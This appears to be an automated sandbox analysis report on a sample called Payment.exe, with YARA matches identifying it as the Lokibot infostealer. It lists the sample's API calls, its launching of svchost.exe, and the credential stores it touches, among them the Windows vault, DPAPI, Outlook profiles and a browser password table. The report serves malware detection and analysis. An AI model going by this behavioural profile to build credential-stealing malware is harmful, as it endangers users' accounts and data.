Code function: 0_2_0087A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_0087A1EF

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_00868310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00868310

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_008751BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_008751BD

Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0081E6A0	0_2_0081E6A0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0083D975	0_2_0083D975
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_008321C5	0_2_008321C5
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_008462D2	0_2_008462D2
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_008903DA	0_2_008903DA
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0084242E	0_2_0084242E
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_008325FA	0_2_008325FA
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_008266E1	0_2_008266E1
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0086E616	0_2_0086E616
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0084878F	0_2_0084878F
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_00878889	0_2_00878889
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_00828808	0_2_00828808
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_00846844	0_2_00846844
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_00890857	0_2_00890857
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0083CB21	0_2_0083CB21
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_00846DB6	0_2_00846DB6
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_00826F9E	0_2_00826F9E
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_00823030	0_2_00823030
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_00833187	0_2_00833187
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0083F1D9	0_2_0083F1D9
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_00811287	0_2_00811287
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_00831484	0_2_00831484
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_00825520	0_2_00825520
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_00837696	0_2_00837696
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_00825760	0_2_00825760
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_00831978	0_2_00831978
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_00849AB5	0_2_00849AB5
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0081FCE0	0_2_0081FCE0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_00831D90	0_2_00831D90
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0083BDA6	0_2_0083BDA6
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_00897DDB	0_2_00897DDB
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_00823FE0	0_2_00823FE0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0081DF00	0_2_0081DF00
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_01823620	0_2_01823620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040549C	1_2_0040549C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004029D4	1_2_004029D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00C62720	1_2_00C62720

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00405B6F appears 42 times
Source: C:\Users\user\Desktop\Payment.exe	Code function: String function: 00830AE3 appears 70 times
Source: C:\Users\user\Desktop\Payment.exe	Code function: String function: 00817DE1 appears 36 times
Source: C:\Users\user\Desktop\Payment.exe	Code function: String function: 00838900 appears 42 times

Source: Payment.exe, 00000000.00000003.1749268379.0000000004243000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Payment.exe
Source: Payment.exe, 00000000.00000003.1749004830.000000000433D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Payment.exe

Source: Payment.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 0.2.Payment.exe.1830000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Payment.exe.1830000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Payment.exe.1830000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Payment.exe.1830000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Payment.exe.1830000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Payment.exe.1830000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Payment.exe.1830000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Payment.exe.1830000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Payment.exe.1830000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: Process Memory Space: Payment.exe PID: 6096, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 2492, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/4@1/1

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_0087A06A GetLastError,FormatMessageW,

0_2_0087A06A

Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_008681CB AdjustTokenPrivileges,CloseHandle,	0_2_008681CB
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_008687E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_008687E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,	1_2_0040650A

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_0087B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0087B3FB

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_0088EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0088EE0D

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_0087C397 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0087C397

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_00814E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00814E89

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00C63360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

1_2_00C63360

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00C63360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

1_2_00C63360

Source: C:\Windows\SysWOW64\svchost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C

Source: C:\Users\user\Desktop\Payment.exe

File created: C:\Users\user\AppData\Local\Temp\aut28E5.tmp

Jump to behavior

Source: Payment.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Payment.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: svchost.exe, 00000001.00000003.1750720503.00000000052A5000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Payment.exe	Virustotal: Detection: 55%
Source: Payment.exe	ReversingLabs: Detection: 31%

Source: unknown	Process created: C:\Users\user\Desktop\Payment.exe "C:\Users\user\Desktop\Payment.exe"
Source: C:\Users\user\Desktop\Payment.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment.exe"
Source: C:\Users\user\Desktop\Payment.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Payment.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: Payment.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Payment.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Payment.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Payment.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Payment.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Payment.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Payment.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: Payment.exe, 00000000.00000003.1749712815.0000000004120000.00000004.00001000.00020000.00000000.sdmp, Payment.exe, 00000000.00000003.1749004830.0000000004210000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Payment.exe, 00000000.00000003.1749712815.0000000004120000.00000004.00001000.00020000.00000000.sdmp, Payment.exe, 00000000.00000003.1749004830.0000000004210000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000001.00000002.2981411012.0000000000C61000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: svchost.pdbUGP source: svchost.exe, 00000001.00000002.2981411012.0000000000C61000.00000020.00000001.01000000.00000005.sdmp

Source: Payment.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Payment.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Payment.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Payment.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Payment.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.Payment.exe.1830000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment.exe.1830000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment.exe PID: 6096, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 2492, type: MEMORYSTR

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_00814B37 LoadLibraryA,GetProcAddress,

0_2_00814B37

Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0087848F push FFFFFF8Bh; iretd	0_2_00878491
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0083E70F push edi; ret	0_2_0083E711
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0083E828 push esi; ret	0_2_0083E82A
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_00838945 push ecx; ret	0_2_00838958
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0083EAEC push edi; ret	0_2_0083EAEE
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0083EA03 push esi; ret	0_2_0083EA05
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402AC0 push eax; ret	1_2_00402AD4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402AC0 push eax; ret	1_2_00402AFC

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00C63360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

1_2_00C63360

Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_008148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_008148D7
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_00895376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00895376

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_00833187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00833187

Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
